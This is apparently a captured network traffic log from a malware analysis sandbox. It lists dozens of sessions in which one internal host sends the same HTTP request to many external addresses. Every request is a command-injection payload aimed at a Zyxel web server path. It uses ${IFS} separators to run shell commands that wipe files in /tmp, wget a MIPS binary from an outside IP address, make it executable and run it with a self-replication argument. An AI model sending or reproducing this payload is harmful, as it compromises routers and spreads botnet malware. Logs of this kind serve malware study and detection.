                                                Jan 28, 2024 10:16:33.931632996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6582192.168.2.2343990188.111.35.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931668997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6583192.168.2.236081868.173.96.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931668997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6584192.168.2.234789252.122.153.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931685925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6585192.168.2.2358574126.229.129.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931735992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6586192.168.2.2356588206.121.37.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931762934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6587192.168.2.2349368174.91.231.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931781054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6588192.168.2.2336298139.93.76.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931812048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6589192.168.2.235429688.207.117.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931828976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6590192.168.2.235822295.239.141.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931879997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6591192.168.2.2342288223.15.164.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931895971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6592192.168.2.2338528112.78.30.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931900978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6593192.168.2.235324276.147.193.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931940079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6594192.168.2.2333934106.248.108.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931945086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6595192.168.2.2345322179.126.58.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931989908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6596192.168.2.2348406190.89.176.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931989908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6597192.168.2.2341900166.149.104.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932014942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6598192.168.2.235675431.67.93.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932061911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6599192.168.2.235046296.63.174.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932070017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6600192.168.2.235278666.39.147.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932104111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6601192.168.2.234968277.219.182.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932132959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6602192.168.2.233380442.120.188.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932133913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6603192.168.2.2334168203.93.131.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932159901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6604192.168.2.234816075.247.59.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932202101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6605192.168.2.234880854.106.214.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932239056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6606192.168.2.2347028194.145.241.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932281017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6607192.168.2.233853895.248.208.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932327032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6608192.168.2.2353864156.41.210.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932332993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6609192.168.2.235527632.66.163.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932353973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6610192.168.2.236074418.215.149.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932419062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6611192.168.2.2348874212.125.143.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932446003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6612192.168.2.2347666110.180.73.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932446003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6613192.168.2.2358854137.145.43.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932491064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6614192.168.2.2341188103.57.127.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932495117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6615192.168.2.235407024.132.240.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932518005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6616192.168.2.2348832156.194.56.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932554007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6617192.168.2.2341092208.95.135.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932578087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6618192.168.2.234033450.13.47.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932615995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6619192.168.2.233869287.196.19.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932643890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6620192.168.2.234704271.85.172.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932812929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6621192.168.2.235043465.31.139.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932828903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6622192.168.2.2339134172.251.25.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932856083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6623192.168.2.2342242222.250.47.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932868004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6624192.168.2.234509654.54.31.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932910919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6625192.168.2.2337630222.33.104.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932934046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6626192.168.2.2348630204.103.148.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932950974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6627192.168.2.234032075.195.107.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.932977915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6628192.168.2.2351288135.14.243.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933022976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6629192.168.2.2337634118.39.5.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933033943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6630192.168.2.234567052.164.130.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933052063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6631192.168.2.233698080.62.141.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933094025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6632192.168.2.235149090.200.179.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933131933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6633192.168.2.2360064131.53.83.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933151007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6634192.168.2.234173478.154.85.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933182955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6635192.168.2.233501865.75.87.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933219910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6636192.168.2.2358824176.65.115.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933276892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6637192.168.2.2353244187.164.80.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933284044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6638192.168.2.2357088180.239.40.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933325052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6639192.168.2.235938092.107.203.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933345079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6640192.168.2.2344524161.202.42.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933382034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6641192.168.2.2343442108.32.230.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933401108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6642192.168.2.2338978188.220.205.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933451891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6643192.168.2.2342598176.195.160.85443
                                                TimestampBytes transferredDirectionData
